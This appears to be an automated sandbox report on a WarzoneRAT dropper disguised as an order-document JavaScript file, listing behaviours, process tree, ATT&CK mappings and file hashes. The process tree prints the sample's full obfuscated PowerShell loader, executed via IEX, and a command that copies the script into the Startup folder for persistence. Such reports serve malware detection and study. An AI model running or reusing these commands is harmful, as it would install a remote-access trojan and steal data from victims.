Overview

overview

10

Static

static

Order PO-3...BOQ.js

windows7-x64

10

Order PO-3...BOQ.js

windows10-2004-x64

10

Analysis

  • max time kernel
    186s
  • max time network
    238s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    05-12-2022 09:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Order PO-3112041-20326063BOQ.js

  • Size

    1KB

  • MD5

    f384eeb88cfc352b593f2ad0327fc8e5

  • SHA1

    e6aefd80a85dde5d4d55189a2f1136d452b64a37

  • SHA256

    1e1d7df8408886f486df3e57ee5b292d98329d351f9ddbe17b013a2aa37a5afd

  • SHA512

    389847737982847e472f17fb6333f5559e39c63640eee1faa1922de73ac2f4c08e4b0afb94a417688194dc4451855df729a572059048a246eb8aabd4db0a1090

Score
10/10
warzoneratinfostealerrat

Malware Config

Signatures

  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    ratinfostealerwarzonerat
  • Warzone RAT payload 8 IoCs
    rat
  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Order PO-3112041-20326063BOQ.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $o00=[char]105 + 'EX';sal P $o00 $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,51155111,51151111,51115111,51115551,51151115,51155511,51151111,55151115,51155511,51151111,51151151,55151111,51151511,51155551,51115511,55151111,51151555,51115555,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } (('[syst' + 'em.Str' + 'ing]::Join('''', $gf)')|P)|P } ermkflll
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1104
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
          PID:2040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Admin\AppData\Local\Temp\Order PO-3112041-20326063BOQ.js' 'C:\Users\Admin\\AppData\\Roaming\\Microsoft\\Windows\Start Menu\Programs\Startup\'
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: RenamesItself
        • Suspicious use of AdjustPrivilegeToken
        PID:1008
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:520 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1812

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\BLX8AYZC.txt
      Filesize

      608B

      MD5

      0c58a2b59ecf03a64e7115c0dad7aef8

      SHA1

      8b7464a58be484d11494db1444c83ef37cdef1af

      SHA256

      67e51b62be30be3cbd41215bc94250bdd8af9a68e4c4b17bb3a703aca392a355

      SHA512

      6e99636fa123127bb6096deb90abe0fc7c3109bb33453eab86514bb38c801000138e103d3873ab6e5c594b49122a3257711601f09c40859bda607fa2587affd3

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      Filesize

      7KB

      MD5

      b1f4b2b90ccc855d4df579c83a9c6fb5

      SHA1

      8a750a68189534bad3391743919eaa362f673a37

      SHA256

      4a38c642a5153c5f6cf01b847a8869d9699ebebf0af3fc2e87efe6829ef2a743

      SHA512

      ab7305fcc04d378ff514e22491bb955a048c1c3b9d822e30d85ad71f7afe0e3ff302b803640633394f76e6fd7f46b984700da1f44ae8f5d2aa98a292235bda26

      Download Submit
    • \Users\Admin\AppData\Local\Temp\11d5600c-2bda-4d22-b1dc-d8a970181a72\AgileDotNetRT64.dll
      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

      Download Submit
    • \Users\Admin\AppData\Local\Temp\784b3b15-2b8e-42df-b11e-ec70bb6ec5f0\AgileDotNetRT64.dll
      Filesize

      75KB

      MD5

      42b2c266e49a3acd346b91e3b0e638c0

      SHA1

      2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

      SHA256

      adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

      SHA512

      770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

      Download Submit
    • memory/296-54-0x0000000000420000-0x0000000000430000-memory.dmp
      Filesize

      64KB

      Download
    • memory/296-55-0x000007FEFBDD1000-0x000007FEFBDD3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1008-65-0x0000000002894000-0x0000000002897000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1008-69-0x0000000002894000-0x0000000002897000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1008-62-0x000007FEF3940000-0x000007FEF4363000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1008-63-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1008-57-0x0000000000000000-mapping.dmp
      Download
    • memory/1008-70-0x000000000289B000-0x00000000028BA000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1008-67-0x000000001B7D0000-0x000000001BACF000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1104-71-0x00000000027EB000-0x000000000280A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1104-68-0x000000001B880000-0x000000001BB7F000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1104-91-0x00000000027EB000-0x000000000280A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1104-61-0x000007FEF3940000-0x000007FEF4363000-memory.dmp
      Filesize

      10.1MB

      Download
    • memory/1104-73-0x00000000027EB000-0x000000000280A000-memory.dmp
      Filesize

      124KB

      Download
    • memory/1104-64-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1104-75-0x000007FEF2C50000-0x000007FEF2DD4000-memory.dmp
      Filesize

      1.5MB

      Download
    • memory/1104-56-0x0000000000000000-mapping.dmp
      Download
    • memory/1104-66-0x00000000027E4000-0x00000000027E7000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1104-92-0x00000000027E4000-0x00000000027E7000-memory.dmp
      Filesize

      12KB

      Download
    • memory/2040-77-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-83-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-82-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-85-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-87-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-88-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-89-0x000000000040B556-mapping.dmp
      Download
    • memory/2040-80-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-78-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-93-0x0000000075491000-0x0000000075493000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2040-94-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download
    • memory/2040-95-0x0000000000400000-0x0000000000568000-memory.dmp
      Filesize

      1.4MB

      Download